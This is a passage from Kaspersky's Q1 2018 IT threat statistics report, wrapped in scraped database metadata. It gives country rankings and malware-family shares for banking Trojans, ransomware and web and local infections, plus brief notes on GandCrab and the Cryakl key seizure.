country.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171359/180511-it-threats-q1-18-statistics-13.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171359/180511-it-threats-q1-18-statistics-13.png>)\n\n \n**_Geography of banking malware attacks in Q1 2018 (percentage of attacked users)_**\n\n**TOP 10 countries by percentage of attacked users**\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Cameroon | 2.1 \n2 | Germany | 1.7 \n3 | South Korea | 1.5 \n4 | Libya | 1.5 \n5 | Togo | 1.5 \n6 | Armenia | 1.4 \n7 | Georgia | 1.4 \n8 | Moldova | 1.2 \n9 | Kyrgyzstan | 1.2 \n10 | Indonesia | 1.1 \n \n_These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data. \nExcluded are countries with relatively few Kaspersky Lab' product users (under 10,000). \n** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### TOP 10 banking malware families\n\n**TOP 10 malware families used to attack online banking users in Q1 2018 (by share of attacked users):**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | Zbot | Trojan.Win32. Zbot | 28.0% | \n2 | Nymaim | Trojan.Win32. Nymaim | 20.3% | \n3 | Caphaw | Backdoor.Win32. Caphaw | 15.2% | \n4 | SpyEye | Backdoor.Win32. SpyEye | 11.9% | \n5 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 4.5% | \n6 | Emotet | Backdoor.Win32. Emotet | 2.4% | \n7 | Neurevt | Trojan.Win32. Neurevt | 2.3% | \n8 | Shiz | Backdoor.Win32. Shiz | 2.1% | \n9 | Gozi | Trojan.Win32. Gozi | 1.9% | \n10 | ZAccess | Backdoor.Win32. ZAccess | 1.3% | \n \n_* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.__ \n** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2018, TrickBot departed the rating to be replaced by Emotet (2.4%), also known as _Heodo_. Trojan.Win32.Zbot (28%) and Trojan.Win32.Nymaim (20.3%) remain in the lead, while Trojan.Win32.Neurevt (2.3%), also known as Betabot, suffered a major slide. Meanwhile, Caphaw (15.2%) and NeutrinoPOS (4.5%) climbed significantly, as did their Q1 activity.\n\n### Cryptoware programs\n\n#### Q1 events\n\nQ1 2018 passed without major incidents or mass cryptoware epidemics. The highlight was perhaps the emergence and widespread occurrence of a new Trojan called [GandCrab](<https://threatpost.com/tag/gandcrab-ransomware/>). Notable features of the malware include:\n\n * Use of C&C servers in the .bit domain zone (this top-level domain is supported by an alternative decentralized DNS system based on Namecoin technology)\n * Ransom demand in the cryptocurrency Dash\n\nGandCrab was first detected in January. The cybercriminals behind it used spam emails and exploit kits to deliver the cryptoware to victim computers.\n\nThe RaaS (ransomware as a service) distribution model continues to attract malware developers. In February, for example, there appeared a new piece of ransomware called [Data Keeper](<https://securelist.ru/data-keeper-ransomware/88883/>), able to be distributed by any cybercriminal who so desired. Via a special resource on the Tor network, the creators of Data Keeper made it possible to generate executable files of the Trojan for subsequent distribution by \"affilate program\" participants. A dangerous feature of this malware is its ability to automatically propagate inside a local network. Despite this, Data Keeper did not achieve widespread distribution in Q1.\n\nOne notable success in the fight against cryptoware came from Europe: with the assistance of Kaspersky Lab, Belgian police [managed to locate and confiscate](<https://www.europol.europa.eu/newsroom/news/no-more-ransom-update-belgian-federal-police-releases-free-decryption-keys-for-cryakl-ransomware>) a server used by the masterminds behind the Trojan Cryakl. Following the operation, [Kaspersky Lab was given](<https://www.kaspersky.com/about/press-releases/2018_no-more-ransom-update>) several private RSA keys required to decrypt files encrypted with certain versions of the Trojan. As a result, we were able to develop a [tool](<https://support.kaspersky.com/viruses/disinfection/10556>) to assist victims.\n\n#### Number of new modifications\n\nIn Q1 2018, there appeared several new cryptors, but only one, GandCrab, was assigned a new family in our classification. The rest, which are not widely spread, continue to be detected with generic verdicts.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171409/180511-it-threats-q1-18-statistics-14.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171409/180511-it-threats-q1-18-statistics-14.png>)\n\n_Number of new cryptoware modifications, Q2 2017 \u2013 Q1 2018_\n\nThe number of new modifications fell sharply against previous quarters. The trend indicates that cybercriminals using this type of malware are becoming less active.\n\n#### Number of users attacked by Trojan cryptors\n\nDuring the reporting period, Kaspersky Lab products blocked cryptoware attacks on the computers of 179,934 unique users. Despite fewer new Trojan modifications, the number of attacked users did not fall against Q3.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171418/180511-it-threats-q1-18-statistics-15.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171418/180511-it-threats-q1-18-statistics-15.png>)\n\n_Number of unique users attacked by cryptors, Q1 2018_\n\n#### Geography of attacks\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171429/180511-it-threats-q1-18-statistics-16.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171429/180511-it-threats-q1-18-statistics-16.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Uzbekistan | 1.12 \n2 | Angola | 1.11 \n3 | Vietnam | 1.04 \n4 | Venezuela | 0.95 \n5 | Indonesia | 0.95 \n6 | Pakistan | 0.93 \n7 | China | 0.87 \n8 | Azerbaijan | 0.75 \n9 | Bangladesh | 0.70 \n10 | Mongolia | 0.64 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThe makeup of the rating differs markedly from 2017. That said, most positions were again filled by Asian countries, while Europe did not have a single representative in the TOP 10 countries attacked by cryptors.\n\nDespite not making the TOP 10 last year, Uzbekistan (1.12%) and Angola (1.11%) came first and second. Vietnam (1.04%) moved from second to third, Indonesia (0.95%) from third to fifth, and China (0.87%) from fifth to seventh, while Venezuela (0.95%) climbed from eighth to fourth.\n\n**TOP 10 most widespread cryptor families**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 38.33 | \n2 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 4.07 | \n3 | Cerber | Trojan-Ransom.Win32.Zerber | 4.06 | \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 2.99 | \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.77 | \n6 | Shade | Trojan-Ransom.Win32.Shade | 2.61 | \n7 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 1.64 | \n8 | Crysis | Trojan-Ransom.Win32.Crusis | 1.62 | \n9 | Locky | Trojan-Ransom.Win32.Locky | 1.23 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.15 | \n| | | | | \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThis quarter, the rating is again topped by WannaCry (38.33%), extending its already impressive lead. Second place was claimed by PolyRansom (4.07%), also known as VirLock, a worm that's been around for a while. This malware substitutes user files with modified instances of its own body, and places victim data inside these copies in an encrypted format. Statistics show that a new modification detected in December immediately began to attack user computers.\n\nThe remaining TOP 10 positions are taken by Trojans already known from previous reports: Cerber, Cryakl, Purgen, Crysis, Locky, and Shade.\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2018, Kaspersky Lab solutions blocked **796,806,112 **attacks launched from Internet resources located in 194 countries worldwide. **282,807,433** unique URLs were recognized as malicious by Web Anti-Virus components. These indicators are significantly higher than in previous quarters. This is largely explained by the large number of triggers in response to attempts to download web miners, which came to prominence towards the end of last year and continue to outweigh other web threats.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171439/180511-it-threats-q1-18-statistics-17.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171439/180511-it-threats-q1-18-statistics-17.png>)\n\n_Distribution of web attack sources by country, Q1 2018_\n\nThis quarter, Web Anti-Virus was most active on resources located in the US (39.14%). Canada, China, Ireland, and Ukraine dropped out of TOP 10 to be replaced by Luxembourg (1.33%), Israel (0.99%), Sweden (0.96%), and Singapore (0.91%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Belarus | 40.90 \n2 | Ukraine | 40.32 \n3 | Algeria | 39.69 \n4 | Albania | 37.33 \n5 | Moldova | 37.17 \n6 | Greece | 36.83 \n7 | Armenia | 36.78 \n8 | Azerbaijan | 35.13 \n9 | Kazakhstan | 34.64 \n10 | Russia | 34.56 \n11 | Kyrgyzstan | 33.77 \n12 | Venezuela | 33.10 \n13 | Uzbekistan | 31.52 \n14 | Georgia | 31.40 \n15 | Latvia | 29.85 \n16 | Tunisia | 29.77 \n17 | Romania | 29.09 \n18 | Qatar | 28.71 \n19 | Vietnam | 28.66 \n20 | Serbia | 28.55 \n \n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.69% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171448/180511-it-threats-q1-18-statistics-18.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171448/180511-it-threats-q1-18-statistics-18.png>)\n\n_Geography of malicious web attacks in Q1 2018 (percentage of attacked users)_\n\nThe countries with the safest surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%), and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.). _\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q1 2018, our File Anti-Virus detected **187,597,494** malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only **Malware-class** attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.03 \n2 | Afghanistan | 56.02 \n3 | Yemen | 54.99 \n4 | Tajikistan | 53.08 \n5 | Algeria | 49.07 \n6 | Turkmenistan | 48.68 \n7 | Ethiopia | 48.21 \n8 | Mongolia | 46.84 \n9 | Kyrgyzstan | 46.53 \n10 | Sudan | 46.44 \n11 | Vietnam | 46.38 \n12 | Syria | 46.12 \n13 | Rwanda | 46.09 \n14 | Laos | 45.66 \n15 | Libya | 45.50 \n16 | Djibouti | 44.96 \n17 | Iraq | 44.65 \n18 | Mauritania | 44.55 \n19 | Kazakhstan | 44.19 \n20 | Bangladesh | 44.15 \n \n_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). \n_** _Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat in Q1.\n\nThe figure for Russia was 30.92%.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171457/180511-it-threats-q1-18-statistics-19.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171457/180511-it-threats-q1-18-statistics-19.png>)\n\n**The safest countries in terms of infection risk included** Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czech Republic (7.89%), Ireland (6.86%), and Japan (5.79%).", "cvss3": {}, "published": "2018-05-14T10:00:30", "type": "securelist", "title": "IT threat evolution Q1 2018. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-4878"], "modified": "2018-05-14T10:00:30", "id": "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "href": "https://securelist.com/it-threat-evolution-q1-2018-statistics/85541/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-03T11:50:54", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/21111141/abstract_blur_code-990x400.jpg)\n\n## Key findings\n\nWhile investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog

Despite Ringleader’s Arrest, Cobalt Group Still Active

Description

Related